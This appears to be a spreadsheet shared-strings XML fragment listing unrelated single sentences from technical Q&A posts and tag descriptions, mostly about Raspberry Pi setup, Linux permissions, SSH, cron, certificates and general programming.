    <t>The  is a tag located in the AndroidManifest.xml with various attributes like the drawable resource of the icon, the label, the name or the permissions.</t>
  </si>
  <si>
    <t>Blockstack is a network for building decentralized apps that you access through the Blockstack Browser, built on top of the Bitcoin blockchain.</t>
  </si>
  <si>
    <t>The keyword FROM must follow the last selected item in a SELECT statement or the privileges in a REVOKE statement.</t>
  </si>
  <si>
    <t>Use the Tampermonkey tag if running Tampermonkey or Violentmonkey, use the "Greasemonkey-4" tag if running that engine on Firefox.</t>
  </si>
  <si>
    <t>Questions regarding intellectual property may be off-topic.</t>
  </si>
  <si>
    <t>By default these instance are private, but they can be shared with other users on the same computer.</t>
  </si>
  <si>
    <t>Different type systems ensure varying degrees of type safety.</t>
  </si>
  <si>
    <t>A proxy selector is a concrete sub-class of this class and is registered by invoking the setDefault method.</t>
  </si>
  <si>
    <t>With Safari 5 and IE9, you must disable Web Workers and use a Typed Array polyfill.</t>
  </si>
  <si>
    <t>This tag represents both the  class and SafeFileDialog class from .NET.</t>
  </si>
  <si>
    <t>While this login pane might be perfectly added to any top-level container (i.e.</t>
  </si>
  <si>
    <t>Usually, software allows to enable or disable smart quotes.</t>
  </si>
  <si>
    <t>Usage
Introspectors are not directly used, but they may need to be instantiated and registered with ObjectMapper and related objects.</t>
  </si>
  <si>
    <t>There is no effective technical solution to protect, encode or encrypt PHP source code.</t>
  </si>
  <si>
    <t>The Uploader also supports a restriction to a list of valid extensions.</t>
  </si>
  <si>
    <t>More information can be found on Wikipedia's definition of access control lists.</t>
  </si>
  <si>
    <t>Type 2: Type 2 NFC tags also have data collision protection and can be rewriteable or read-only.</t>
  </si>
  <si>
    <t>An example of a Device Instance ID is:
Homepage: Microsoft Device Instance ID page on Microsoft.com
Device Instance IDs are part of the broader Device Identification Strings</t>
  </si>
  <si>
    <t>Status: Initializing TLS... 
  Error:  Received TLS alert from the server: Handshake failed (40) 
  Error:  Could not connect to server
My Raspberry Pi and my PC are on the same LAN: I typed
ftpes://192.168.1.17
  in the FTP field in FileZilla.</t>
  </si>
  <si>
    <t>I am attempting to limit who may log in by active directory group.</t>
  </si>
  <si>
    <t>The payload probably has different header fields, possibly including an incrementing transaction ID.</t>
  </si>
  <si>
    <t>JavaScript has its own security model, but this is not designed to protect the Web site owner or the data passed between the browser and the server.</t>
  </si>
  <si>
    <t>The  singleton instance corresponds to a single VPN configuration as displayed in the VPN Settings panel in the Settings app on iOS and the Network Preferences pane in the System Preferences application in macOS.</t>
  </si>
  <si>
    <t>I have my auto start python script in /etc/profile
It seems to start the script each time I log into ssh.</t>
  </si>
  <si>
    <t>Next you should check the file permissions using ls -l `which raspistill` and see the owner data and file permissions which are displayed as -rwxr-xr-- (This is a common permission set, yours might vary).</t>
  </si>
  <si>
    <t>There are a host of different ways to do so; probably the easiest is to log in to the shell on that machine as root and type .</t>
  </si>
  <si>
    <t>Sysfs exports information about devices and drivers from the kernel device model to user space, and is also used for configuration.</t>
  </si>
  <si>
    <t>Mouseenter is an event that fires when the user moves the mouse inside of the element you registered the event on.</t>
  </si>
  <si>
    <t>I think that I have a permission issue since the script fails at a point where it should execute some system commands which require root.</t>
  </si>
  <si>
    <t>In the past we used to wrap a pair of identity elements around the element to be measured, and added it to a bin.</t>
  </si>
  <si>
    <t>It will write raspbian to the SD card and add a startup script to connect to the network and enable ssh.</t>
  </si>
  <si>
    <t>Add the following header:
also, in the payload must be added a device authentication property otherwise the service will be auto regenerated for them.</t>
  </si>
  <si>
    <t>Note that If I don't specify as shown above, the default setting is http://localhost:5000 which makes the web server inaccessible from other devices.</t>
  </si>
  <si>
    <t>When not using RPCAP_RMTAUTH_NULL authentication it will instead use the other type, RPCAP_RMTAUTH_PWD : https://www.winpcap.org/docs/docs_412/html/group__remote__auth__methods.html
And according to some old copy of the manual I found (ftp://ftp.tuwien.ac.at/.vhost/winpcap.polito.it/301a/docs/group__remote__auth__methods.html) which helpfully listed code references : "Referenced by daemon_checkauth(), and rpcap_sendauth()."</t>
  </si>
  <si>
    <t>It loads unmanaged PKCS#11 library provided by the cryptographic device vendor and makes its functions accessible to .NET application.</t>
  </si>
  <si>
    <t>This makes reverse-engineering a harder task and stops casual intellectual property violations.</t>
  </si>
  <si>
    <t>X.509 Certificate v3
     Issued from: C=IE, O=Baltimore, OU=CyberTrust, CN=Baltimore CyberTrust Root
     Issued to:   C=US, S=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2
     Valid from:  19/12/2013 20:07:32
     Valid until: 19/12/2017 20:06:55
     WARNING: Certificate signature is INVALID
  Import this certificate into the CA store ?</t>
  </si>
  <si>
    <t>sudo wget https://secure.logmein.com/labs/logmein-hamachi_2.1.0.86-1_armel.deb
sudo apt-get update
sudo apt-get install --fix-missing lsb lsb-core
sudo dpkg --force-architecture --force-depends -i logmein-hamachi_2.1.0.86-1_armel.deb  
sudo hamachi login
sudo hamachi join xxx-xxx-xxx yourkey  
sudo hamachi go-online xxx-xxx-xxx  
Also install and add hamachi on your computer.</t>
  </si>
  <si>
    <t>That's because ICMP packets must be sent over a "raw" socket ... and those are privileged for a few reasons (including some other types of ICMP packets which can affect how the network treats your whole system rather than just the processes, sockets, that you're working with).</t>
  </si>
  <si>
    <t>My question is how would I get this code to work in order to load separate scripts without returning an error and to also run as superuser since the GPIO part of the script needs root access.Should I keep trying with getting the separate script to load or should I try a different method?</t>
  </si>
  <si>
    <t>b) From the linked answer it seems that you need to add the name of the user that should be executing the script:
If the program can only succeed when running as root, use  as the username; but otherwise it's always a good idea to avoid running things as root.</t>
  </si>
  <si>
    <t>When used with the Java Persistence API, the persistence.xml file is usually placed in the META-INF folder; it's used to specify the persistence provider name, entity class names, and properties like the database connection URL, driver, user, password, and so on (taken from http://www.javaworld.com/javaworld/jw-01-2008/jw-01-jpa1.html?page=3).</t>
  </si>
  <si>
    <t>It is closely related to mutable variables, but because IORefs are always mutated within the IO monad, in Haskell at least, type-safety of the programming language ensures that IORefs cannot be modified by pure functions (unless  or similar unsafe functions are called).</t>
  </si>
  <si>
    <t>Note: I'm using JSch for the SSH
This code opens up a semi functioning shell which I can use to execute the command, and the video plays however, the hot keys (space = play/pause, q = exit, left arrow = seek back, right arrow = seek forward) do not work I have tried just pressing the key as you would in a normal shell and pressing the key and enter just as a test but neither worked.</t>
  </si>
  <si>
    <t>In order to do that you need to:
Cross-compile coreclr &amp; corefx (possible on Linux x64 machine)
Extract the dlls without the private and precompiled files to the PI
Copy your app's managed dlls to the PI
Use "corerun" executable to run your app
If you want to skip the above and get a ready made binaries for the Raspberry PI 3 (or even the entire image), you can use my compiled build at:
http://ravendb.net/promo/xmas-win-raspberry-pi
Note:
I was able to do that on Raspberry PI 3, using Headless Ubuntu Server 16.04 and with Ubuntu Mate 16.04.</t>
  </si>
  <si>
    <t>[7] Registering for the service involves the purchase of a trial version of Dynamic DNS Pro at no cost, and requires a valid credit card, effectively rendering the service non-anonymous.</t>
  </si>
  <si>
    <t>I'm using a binder to be able to reference the methods in my encapsulated class for the server targets, eg: if a client enters the root address for the website it runs a response code written in one of the methods in the encapsulated class.</t>
  </si>
  <si>
    <t>I've created an cronjob by  with the following setup
Also i've changed the access permissions after read this in the internet by
chmod a+x capture_upload.py
But this Job don't get fired or there is a failure int he script, but if i run the script by ./capture_upload.py it works like charm.</t>
  </si>
  <si>
    <t>This information will be stored at session variable ($_SESSION) with array key 'smart_ip' and Drupal $user-&gt;data object with array key 'geoip_location' of the user but optionally it can be disabled (by role) at Smart IP admin page.</t>
  </si>
  <si>
    <t>I have been running mono on RPI for a while now, but i have not gone into the security namespace, since mono best supported on linux and they are porting (lose words) the .Net framework to fit linux we can always expect some bugs, especially when namespaces as security,
check out: Mono System.Security.Cryptography.CryptographicException when running on Linux</t>
  </si>
  <si>
    <t>The easiest solution is to create a separate shell script that will do the copying and let expect only handle the password prompt.</t>
  </si>
  <si>
    <t>A service principal name (SPN) distinguishes a Kerberos-protected service running on an IP host (such as HTTP/foo.bar.com) as a unique entity on a Kerberos-protected network.</t>
  </si>
  <si>
    <t>If the owner of the file is not www-data you could do several things such as change the ownership information for the file using chown &lt;user&gt; &lt;file&gt; which I don't recommend or adding execution privileges to the "other" user set with chmod o+x `which raspistill`.</t>
  </si>
  <si>
    <t>It is a strict superset of C (any valid C code is equally valid Objective-C code, with the minor exception that  is a free identifier for user use in C while it is a keyword in Objective-C), and it inherits its object-oriented capabilities from Smalltalk.</t>
  </si>
  <si>
    <t>In this case I need to make sure it's impossible to, say, escape the quotes and the "say" command and execute a malicious script/command on the server.</t>
  </si>
  <si>
    <t>What makes New Horizon different is that major functional elements, such as accounting or payments systems interfaces, come ready made.</t>
  </si>
  <si>
    <t>In all cases, the code thats executed is expected to be valid as file input (see the section File input in the Reference Manual).</t>
  </si>
  <si>
    <t>What code counts as a section and hence can be hidden, can be user specified or automatically added based on the syntax of the language, indentation or tokens (such as brackets).</t>
  </si>
  <si>
    <t>Redistributions of source code must retain the above copyright
#   notice, this list of conditions and the following disclaimer.</t>
  </si>
  <si>
    <t>Sadly - or actually hopefully - as I explained, this cannot work because the IEEE precisely designed the passphrase data type to be 100% sure that anybody, using the most basic keyboard, could always type it.</t>
  </si>
  <si>
    <t>If so, it would seem that you don't actually need to subscribe at all from within your connect event handler, which should hopefully prevent duplicate subscriptions from occurring in the first place.</t>
  </si>
  <si>
    <t>While its underlying hashing algorithm was readily available through the PHP crypt() function, pulling together all the necessary pieces to make this function work was beyond most programmers.</t>
  </si>
  <si>
    <t>I thought disable serial port is a solution but it causes another problem for me to log in and run script.</t>
  </si>
  <si>
    <t>I suspect it has something to do with the Watchdog timer, but even with it disabled via wtd_disable(); in my setup, the problem persists.</t>
  </si>
  <si>
    <t>:)
Most privileges on *nix systems are controlled by user/group file permissions, so the answer is probably to add the web server user to the group that owns smbus.</t>
  </si>
  <si>
    <t>Use to distinguish those acting with top/high level admin system privileges from other users.</t>
  </si>
  <si>
    <t>A component of Php Code Sniffer Package, phpcs script that tokenizes PHP, JavaScript and CSS files to detect violations of a defined coding standard.</t>
  </si>
  <si>
    <t>This simplifies application event handling because you do not need to lock non-static members in the application class when you access them.</t>
  </si>
  <si>
    <t>By default, tasks run with the permissions of the current user of the local computer, or with the permissions of the user specified by the /u parameter, if one is included.</t>
  </si>
  <si>
    <t>If USERGROUPS_ENAB is defined to yes in /etc/login.defs and if a group exists with the same name as the deleted user, then this group will be removed, even if it is still the primary group of another user.</t>
  </si>
  <si>
    <t>I'd like to have some sort of verbose debug printing in arduino that can be enabled/disabled by a flag.</t>
  </si>
  <si>
    <t>When I try  it gives me the following error:
-bash: cd: /media/Owncloud/: Permission denied
How can I access this directory?</t>
  </si>
  <si>
    <t>I tried looking up the default "root" password and found that the "root" user is not enabled on the pi.</t>
  </si>
  <si>
    <t>Verify that th
specified computer name is valid, that the computer is accessible over the
network, and that a firewall exception for the WinRM service is enabled and
allows access from this computer.</t>
  </si>
  <si>
    <t>However, going to Driver Details in Device Manager says: No driver files are required or have been loaded for this device.</t>
  </si>
  <si>
    <t>I have created a new set of ssh keys using
then disabled and enabled ssh again via raspi-config, but nothing seems to work.</t>
  </si>
  <si>
    <t>Im declaring a global variable to assign the token sent by the server to it.</t>
  </si>
  <si>
    <t>adb devices
List of devices attached
&lt;no devices listed&gt;
Two questions:
How can I flip the device back to being debuggable via USB?</t>
  </si>
  <si>
    <t>My approach was to use the HardwarePropertiesManager like this:
This call requires device owner or profile owner permissions (or vr).</t>
  </si>
  <si>
    <t>I've followed this procedure to only allow sftp access to the sftp group
Restricting SFTP user to home directory
for this to work the home directory of the user has to be root owned.</t>
  </si>
  <si>
    <t>I'm working on a project on which I'm using a keypad to type a password, what I've done is that I'm reading keys typed by the user and collect it in an array to compare it with the password.</t>
  </si>
  <si>
    <t>When i plug off the RPI2 from power, and plug it in again, everything works for about a week ( i can access the web app, ssh is accessible, ftp is accessible).</t>
  </si>
  <si>
    <t>This would not be a problem except that I am connecting multiple adapters and need a way to identify the adapter uniquely.</t>
  </si>
  <si>
    <t>So I created a bash script banner for my SSH server, pretty straight forward.</t>
  </si>
  <si>
    <t>I'd love to this over USB, but my searching has revealed that it is most impossible on current phones without rooting them.</t>
  </si>
  <si>
    <t>I think it's distro-dependent because on Debian I was able to open it as a regular user but I need to be root on my Arch distro.</t>
  </si>
  <si>
    <t>As yakiang suggested, ssh into your raspberry pi (this assumes you enabled the ssh deamon to run your pi upon each boot up before this problem occurred).</t>
  </si>
  <si>
    <t>Old entry
The Debian distribution for raspberry does not seem to have a password for root set by default.</t>
  </si>
  <si>
    <t>Another way that should be less a hack would be to build an ANT network for the mesh topology, while having BLE to be able to connect each node to Bluetooth enabled devices.</t>
  </si>
  <si>
    <t>The behavior is not available for IPv6 for backward compatibility, therefore, you may want to avoid these if you intend to support IPv6 with your Python programs.</t>
  </si>
  <si>
    <t>At the same time, I create a function to remove the mac address from the mac deny list to allow the Client connecting.</t>
  </si>
  <si>
    <t>Before typing "yes", make sure that the Yn is connected to internet, otherwise installation will fail.</t>
  </si>
  <si>
    <t>I simply forgot to add the Internet permission to my manifest.xml.</t>
  </si>
  <si>
    <t>If the devices do not actual exist, they will not be probed and will not have entries created in sysfs.</t>
  </si>
  <si>
    <t>You can do it globally as root:
Homebridge's configuration files are stored in ~/.homebridge (if you're using default user "pi", the directory is /home/pi/.homebridge)</t>
  </si>
  <si>
    <t>I find HardwareIdentification class in Windows.System.Profile namespace for generate UniqueID.</t>
  </si>
  <si>
    <t>An instance-based firewall is something you can build yourself, of course, but there are also several products in the AWS Marketplace that provide IPSec tunnel termination and NAT capability.</t>
  </si>
  <si>
    <t>-fstack-protector-strong -Wformat -Werror=format-security  ',
 'CFLAGSFORSHARED': '-fPIC',
 'CONFIGFILES': 'configure configure.ac acconfig.h pyconfig.h.in Makefile.pre.in',
 'CONFIGURE_CFLAGS': '-Wdate-time -D_FORTIFY_SOURCE=2 -g -fdebug-prefix-map=/build/python2.7-9xgeTe/python2.7-2.7.13=.</t>
  </si>
  <si>
    <t>If you really want to secure your Intellectual Property, then perhaps the Raspberry Pi isn't the best option?</t>
  </si>
  <si>
    <t>You must initialize the classes before using them in void loop(), else the class won't be recognised.</t>
  </si>
  <si>
    <t>In C++, structure is equivalent to a class just with an exception of default access specifier being public.</t>
  </si>
  <si>
    <t>Check that the fingerprint in your installed  corresponds to the current fingerprint.</t>
  </si>
  <si>
    <t>The callback function onKeyPress_func you provided is only called when key_mask is unequal 0 and when the key state has changed since last checked.</t>
  </si>
  <si>
    <t>You should send the first key code starting at offset 2:
buf[2] = SCRLCK;
Offset 0 is used for key modifier flags like ctrl, alt, etc.</t>
  </si>
  <si>
    <t>Where user types means any type in an assembly that isnt signed with the .NET key token.</t>
  </si>
  <si>
    <t>A JavaScript beautifier that reformats and reindents bookmarklets, poorly-written JavaScript, unpack scripts packed by Dean Edwards popular packer, as well as deobfuscate scripts processed by javascriptobfuscator.com.</t>
  </si>
  <si>
    <t>validates_uniqueness_of is a rails helper method for determining whether an attribute is unique throughout a system</t>
  </si>
  <si>
    <t>Only used on old and popular locked questions asking for lists of hidden features.</t>
  </si>
  <si>
    <t>In order for a driver to be signed, a developer must obtain an Authenticode certificate with which to sign the driver.</t>
  </si>
  <si>
    <t>Pechkin is available in NuGet repo: in most cases you should use SynchronizedPechkin as it protects multithreaded code from crashing the lib.</t>
  </si>
  <si>
    <t>Effective copy protection as well as protecting user rights is still an ongoing problem with media publication.</t>
  </si>
  <si>
    <t>Configure role-based security that determines access to items and operations.</t>
  </si>
  <si>
    <t>Microchip requires that "The header files should state that they are only to be used with authentic Microchip devices" which makes them incompatible with the GPL.</t>
  </si>
  <si>
    <t>Likewise, access to USML items on corporate systems such as intranets by foreign persons overseas or in the U.S. is considered a Retransfer of the items.</t>
  </si>
  <si>
    <t>Oracle MAF provides a complete MVC development framework - that
leverage Java, HTML5 and JavaScript - with declarative user interface
definition, device services integration and built-in security.</t>
  </si>
  <si>
    <t>Each cluster is identified by placing its machines into EC2 security groups whose names are derived from the name of the cluster.</t>
  </si>
  <si>
    <t>It is a tool in which code constructs can be entered and tested for correctness before being compiled.</t>
  </si>
  <si>
    <t>Type 4: Type 4 NFC tags can use either NFC-A or NFC-B communication and have data collision protection.</t>
  </si>
  <si>
    <t>Any public static (Shared in VB) members of this type are thread safe.</t>
  </si>
  <si>
    <t>Use these tools to register and launch instances, manipulate security groups, and more.</t>
  </si>
  <si>
    <t>I cannot just run my application with root permission, I need ownership of ttyACM* (note I have also tried OWNER="myusername" instead of MODE:="0666").</t>
  </si>
  <si>
    <t>I tried the same thing in a Console application and it works perfectly, so the XML must be valid/parsable.</t>
  </si>
  <si>
    <t>For example disabling usb ports, encoding script...</t>
  </si>
  <si>
    <t>From the security note (https://security.googleblog.com/2015/09/disabling-sslv3-and-rc4.html) it states:
'At least the certificates in https://pki.google.com/roots.pem must be trusted.'</t>
  </si>
  <si>
    <t>NOTE:  Windows 8 can read the kernel config file unmodified - no special drivers needed.</t>
  </si>
  <si>
    <t>All detected build as armv6l-unknown-linux-gnueabihf when running ./configure.</t>
  </si>
  <si>
    <t>Since it lives after exiting the function, the address will still be valid.</t>
  </si>
  <si>
    <t>The messages youre getting from GDB when running Python suggest the Python executable youre trying to use is for some reason corrupted.</t>
  </si>
  <si>
    <t>You probably shouldn't send an SMS if the location field is not valid.</t>
  </si>
  <si>
    <t>In this scenario, the "Ports" section in the object explorer was hidden.</t>
  </si>
  <si>
    <t>Please note that a Unix system will not allow anyone other than the superuser (root) to start services on port numbers &lt; 1024, so you'd need to run the application as root, or with sudo.</t>
  </si>
  <si>
    <t>In your script, you should be able to do something like:
A passwordless keypair is probably safer than a password in a script, though, even though it's not the height of security.</t>
  </si>
  <si>
    <t>Since it asks for a password within the Python script, I would assume that your server sees the script as a non-admin.</t>
  </si>
  <si>
    <t>u := uintptr(unsafe.Pointer(p))
syscall.Syscall(SYS_READ, uintptr(fd), u, uintptr(n))
This use of unsafe is the trick that will let you "lock" the Go object that Dave Maze was looking for above.</t>
  </si>
  <si>
    <t>Password Hash is native to PHP 5.5.0 or later, however, a compatible library exists for PHP 5.3.7 or later, that functions in the same way.</t>
  </si>
  <si>
    <t>User data is protected via an on-demand contact list backup and retrieval to/from a cloud-based service.</t>
  </si>
  <si>
    <t>Each entry consists of one object that represents the key and a second object that is that keys value.</t>
  </si>
  <si>
    <t>It is also important to always check dynamic identifiers against a list of allowed values.</t>
  </si>
  <si>
    <t>In Rust, the unsafe keyword denotes a function or block that is implemented outside some of the safeguards of the compiler.</t>
  </si>
  <si>
    <t>In general, an application may utilize such ACL's to control access to certain protected objects by other requesting objects.</t>
  </si>
  <si>
    <t>Announcing LinuxKit: A Toolkit for building Secure, Lean and Portable Linux Subsystems
2.</t>
  </si>
  <si>
    <t>It protects users by bouncing their communications around a distributed network of relays run by anonymous volunteers all around the globe.</t>
  </si>
  <si>
    <t>The Manifest may affect everything from type of instancing to meta-data, even security restrictions.</t>
  </si>
  <si>
    <t>Both are only visible to users as opaque pointers manipulated with provided API functions.</t>
  </si>
  <si>
    <t>Raspberry Pi uses ARM, PILLOW that is installed is not compatible, hence the instruction is illegal.</t>
  </si>
  <si>
    <t>Note: I already disabled the serial login.</t>
  </si>
  <si>
    <t>it shows the error implicit declaration of function is invalid C99.</t>
  </si>
  <si>
    <t>Disabling a2d function
Changing FFT length to 512, 2048, 4096.</t>
  </si>
  <si>
    <t>My Codes are Below
Note: I have 4 SPI address, and i create instance with them.</t>
  </si>
  <si>
    <t>Also misconfiguring GCC for ARMv7 (Raspebby Pi is ARMv6) may lead to Illegal Instruction error.</t>
  </si>
  <si>
    <t>Therefore, they actually have different type signatures from plain functions.</t>
  </si>
  <si>
    <t>I may edit this tomorrow)
The environment variables of the cron daemon are not the same as the login shells.</t>
  </si>
  <si>
    <t>Look into certificate-based authentication where certificates are provisioned to each device during or prior to production.</t>
  </si>
  <si>
    <t>From the error, it looks like you registered the device with the wrong type of SSL key.</t>
  </si>
  <si>
    <t>if you created an RSA key with the x509 certificate wrapper, be sure that your device is registered with that type and not just the RSA key.</t>
  </si>
  <si>
    <t>Some of the unsolicited result codes can be individually disabled, but some (e.g.</t>
  </si>
  <si>
    <t>NEWID() is a SQL Server function which creates a unique value of type uniqueidentifier.</t>
  </si>
  <si>
    <t>A Proxy may
Provide a surrogate or placeholder for another object to control access to it.</t>
  </si>
  <si>
    <t>I want to protect/hide the source code.</t>
  </si>
  <si>
    <t>The script runs up until "require_once('passwordhash.php');" Everything beneath doesn't run, so the first function "create_hash()" doesn't even work.</t>
  </si>
  <si>
    <t>During the initial testing, the keystore name/password and the certificate id were left with the default values.</t>
  </si>
  <si>
    <t>php function to execute a command on a remote server using ssh protocol.</t>
  </si>
  <si>
    <t>Adding or omitting username
On some systems, there's an /etc/crontab.</t>
  </si>
  <si>
    <t>On a certain condition a button has to be disabled, if that condition is true and the button is disabled, the style that has to be applied is so in every browser including IE, on mouse over a prohibitory sign pops up, but in IE a click is still registered and executed.</t>
  </si>
  <si>
    <t>Some features include
Safe-by-default templates
Hierarchical MVC via components
Virtual DOM diffing and compilable templates
Intelligent auto-redrawing system
Official page and resources: http://mithril.js.org/</t>
  </si>
  <si>
    <t>You can specify the signedness of your variable directly:
Or, you could use the fixed-length integer typedefs (found in the &lt;cstdint&gt; header): 
int8_t pitch;
Generally, you should prefer to use the exact-width types unless you have a good reason not to.</t>
  </si>
  <si>
    <t>One should note that POSIX advisory locking is known to be buggy or even unimplemented on many NFS implementations (including recent versions of Mac OS X) and that there are reports of locking problems for network filesystems under Windows.</t>
  </si>
  <si>
    <t>Finally, note that the new tags are hampered by the 25 character limit -- which is the reason that they are not (yet): sts-security-token-service, sts-simple-template-system, and sts-springsource-tool-suite.</t>
  </si>
  <si>
    <t>For instance, in PHP, using the  function (converts HTML tags to their ISO-8859-1 equivalents) and/or strip_tags() function (completely removes HTML tags) for safe output of text in HTML, and mysql_real_escape_string() to isolate data which will be included in an SQL request, to protect against SQL Injection.</t>
  </si>
  <si>
    <t>Either that or access to my AppEngine-based application, but if I upload it to my app (that will in the next step put the file into a bucket), how can I possibly authenticate the device to make sure that the device that sends it to me is actually the device it claims to be?</t>
  </si>
  <si>
    <t>A Service Principal Name (SPN) distinguishes a Kerberos-protected service running on an IP host (such as HTTP/foo.bar.com) as a unique entity on a Kerberos-protected network.</t>
  </si>
  <si>
    <t>I'm trying to create a Python script that will simply be created in Nano then place it under my startup script file, so when I turn on the raspberry pi the user will type in a password and if that's "True" it will start other devices to work.</t>
  </si>
  <si>
    <t>~/.bash_profile is read and executed following a successful login, and configures bash according to specification.</t>
  </si>
  <si>
    <t>Looking at the API in the HID demo you linked however it is clear that all that is abstracted away and it seems that what you actually need to do is something like:
Note that the modifier is a bit-mask allowing any combination of modifier keys, such as LEFT_CONTROL_KEY_MASK|RIGHT_CONTROL_KEY_MASK.</t>
  </si>
  <si>
    <t>Redistributions of source code must retain the above copyright notice,
#     this list of conditions and the following disclaimer.</t>
  </si>
  <si>
    <t>Assuming you are running Raspbian, SSH is disabled by default, so you must create an empty file named 'ssh' on the SD-card.</t>
  </si>
  <si>
    <t>VFIO is a secure userspace driver framework for Linux, making use of hardware IOMMU enforced device isolation.</t>
  </si>
  <si>
    <t>Add MP3, WAV, M4A (non-protected AAC), M4B (audio book), podcasts, and various video files (single files, directories or existing playlists) to the iPod.</t>
  </si>
  <si>
    <t>This is an additional restriction, gitcvs access still needs to be enabled by the gitcvs.enabled config option unless --export-all was given, too.</t>
  </si>
  <si>
    <t>I have tried using htaccess with basic user/passwords, but that defeats the purpose of having the php login unless I can pass the session to htaccess?</t>
  </si>
  <si>
    <t>Previously I did this with a GUI on my macbook, triggering these commands over ssh, but I now need to be able to trigger them in the absence of an internet connection.</t>
  </si>
  <si>
    <t>connectOptions.setMqttVersion(MqttConnectOptions.MQTT_VERSION_3_1_1);
        // With Google Cloud IoT Core, the username field is ignored, however it must be set for the
        // Paho client library to send the password field.</t>
  </si>
  <si>
    <t>connectOptions.setMqttVersion(MqttConnectOptions.MQTT_VERSION_3_1_1);
            // With Google Cloud IoT Core, the username field is ignored, however it must be set for the
            // Paho client library to send the password field.</t>
  </si>
  <si>
    <t>parser.add_argument(
      '--cloud_region', default='us-central1', help='GCP cloud region')
  parser.add_argument(
      '--ca_certs',
      default='roots.pem',
      help='CA root certificate.</t>
  </si>
  <si>
    <t>I have successfully built and deployed images (custom-vision example) to ACR and have configured Access Keys in the portal.</t>
  </si>
  <si>
    <t>The UWP samples (C#) utilize the ShutdownManager class for reboot and shutdown but it is not existing in the C++ namespace.</t>
  </si>
  <si>
    <t>This is a webform application , that means you can click this button in everywhere,So where do you want keep "test" state with current login user or current Session?</t>
  </si>
  <si>
    <t>You might want to use member initializer list for best practice if you're not going to check for invalid pin.</t>
  </si>
  <si>
    <t>For RealTerm, once installed (don't forget to activate the server registration at the end of the setup, it should be ticked by default though), it will look like below.</t>
  </si>
  <si>
    <t>Feel free to verify and possibly report this on our GitHub issues list.</t>
  </si>
  <si>
    <t>But it still won't work with so many copies of "registered" object into the Animal base class (it shows nothing because  is called).</t>
  </si>
  <si>
    <t>When you send a POST request to Firebase, it automatically generates a Key (Anonymous Key), if you want to use your own key you need to use a PATCH request, this is an example on Python 3:</t>
  </si>
  <si>
    <t>Set ENABLED: [x] Enable download of author images from 3rd party source.</t>
  </si>
  <si>
    <t>Docklight scripting is just suggestion because it is my personal choice for TCP/UDP/RS232/RS485/MODBUS/USB HID, but you can use other software for this.</t>
  </si>
  <si>
    <t>For using these APIs you need enable unsafe code in your project properties like this:
Here is a sample you can reference.</t>
  </si>
  <si>
    <t>-fstack-protector-strong -Wformat -Werror=format-security  ',
 'BUILDEXE': '',
 'BUILDPYTHON': 'python',
 'CC': 'arm-linux-gnueabihf-gcc -pthread',
 'CCSHARED': '-fPIC',
 'CFLAGS': '-fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -Wdate-time -D_FORTIFY_SOURCE=2 -g -fdebug-prefix-map=/build/python2.7-9xgeTe/python2.7-2.7.13=.</t>
  </si>
  <si>
    <t xml:space="preserve">
SerialException: could not open port /dev/ttyS0: [Errno 13] Permission denied: '/dev/ttyS0'
This only means you do not have permission to operate hardware, so you need to use  to execute your script.</t>
  </si>
  <si>
    <t>require operates similarly to dofile in that it executes a Lua file, but it also has more intelligence built in.</t>
  </si>
  <si>
    <t>The function of anti-bot software is to determine when another application is trying to access it as if a real user would and prevent any action that should only be allowed by humans.</t>
  </si>
  <si>
    <t>git-tag is the Git command used to create, list, delete or verify a tag object signed with GPG.</t>
  </si>
  <si>
    <t>A simple plugin for Ruby on Rails that hides records instead of deleting them, enabling recovery.</t>
  </si>
  <si>
    <t>MongoKit brings structured schema and validation layer on top of the great pymongo driver.</t>
  </si>
  <si>
    <t>Tika provides capabilities for identification of more than 1400 file types from the Internet Assigned Numbers Authority taxonomy of MIME types.</t>
  </si>
  <si>
    <t>modifications to fault handlers - Kernel gives control to debugger when an unexpected fault occurs.</t>
  </si>
  <si>
    <t>alt_ctrl_z
Hotkeys aren't tracked if you're inside of an input element (unless you explicitly bind the hotkey directly to the input).</t>
  </si>
  <si>
    <t>It works in sync with your real form elements to ensure accessibility and compatibility.</t>
  </si>
  <si>
    <t>A package is a grouping of related types providing access protection and name space management.</t>
  </si>
  <si>
    <t>Do not reveal confidential information such as API or Account Keys, or any personally identifiable information.</t>
  </si>
  <si>
    <t>The debug build type includes debugging symbols and is signed with the debug key.</t>
  </si>
  <si>
    <t>Note that One-Time-Pad (OTP) construction is a provably secure, theoretical class of ciphers.</t>
  </si>
  <si>
    <t>async starts a new thread, returning an object that resolves itself when the validation completes.</t>
  </si>
  <si>
    <t>Extensible type-safe adapters for selecting entity information.</t>
  </si>
  <si>
    <t>Consistency - The consistency property ensures that any transaction will bring the database from one valid state to another.</t>
  </si>
  <si>
    <t>(This class replaces the older class java.util.StringTokenizer, which was used prior to Java 5 for the same purpose but has less functionality compared to Scanner).</t>
  </si>
  <si>
    <t>You should do something smarter (like a  statement to disable it) but you get the idea here:
I think you'd have to loop to detect key releases in Python.</t>
  </si>
  <si>
    <t>However we are looking for a way to allow the owners of these devices to send commands to them securely, to do this the devices would need to be registered to their owner, so that only they can access them.</t>
  </si>
  <si>
    <t>I am running this script on a Raspberry Pi3 via systemd and it includes watchdog support since I want/need it to run all of the time.</t>
  </si>
  <si>
    <t>After succesfull installation I get an "illegal instruction" error when I import the Image class.</t>
  </si>
  <si>
    <t>I'm trying to run script that is using sudo commands on profile that have set password on sudo.</t>
  </si>
  <si>
    <t>If I perform a signature using the credentials that are natively assigned to the Lambda function (i.e.</t>
  </si>
  <si>
    <t>I'm not sure how much experience you have with interrupts but, it's important to note that timer interrupt can sometimes be "registered" and then they just go.</t>
  </si>
  <si>
    <t>Note: the @reboot feature is not available in all cron implementations (some embedded and stripped down *nix distros don't have it) and often it doesn't work for users other than root.</t>
  </si>
  <si>
    <t>If  is owned by root video (check with ls -l /dev/video0), add yourself to the video group with usermod -aG video your_username, log out, log in, try again.</t>
  </si>
  <si>
    <t>When accessing a domain protected with a SSL certificate (https), you need to specify the SSL thumbprint as a second parameter in the  function:</t>
  </si>
  <si>
    <t>This variable is set through gx_graphics_init (it's here inside graphics.c), which calls gx_priv_font_init if the initialization succeeds.</t>
  </si>
  <si>
    <t>Noip is just a way of being able to associate a name with a dynamic IP address, which again does not imply anything about being accessible to the public.</t>
  </si>
  <si>
    <t>The only difference I made was to add a shebang #!/bin/sh to the start of the docker-entrypoint.sh file, and ensure it has execute permission, by running ls -al, and if it doesn't have x in the permissions, running chmod +rwx.</t>
  </si>
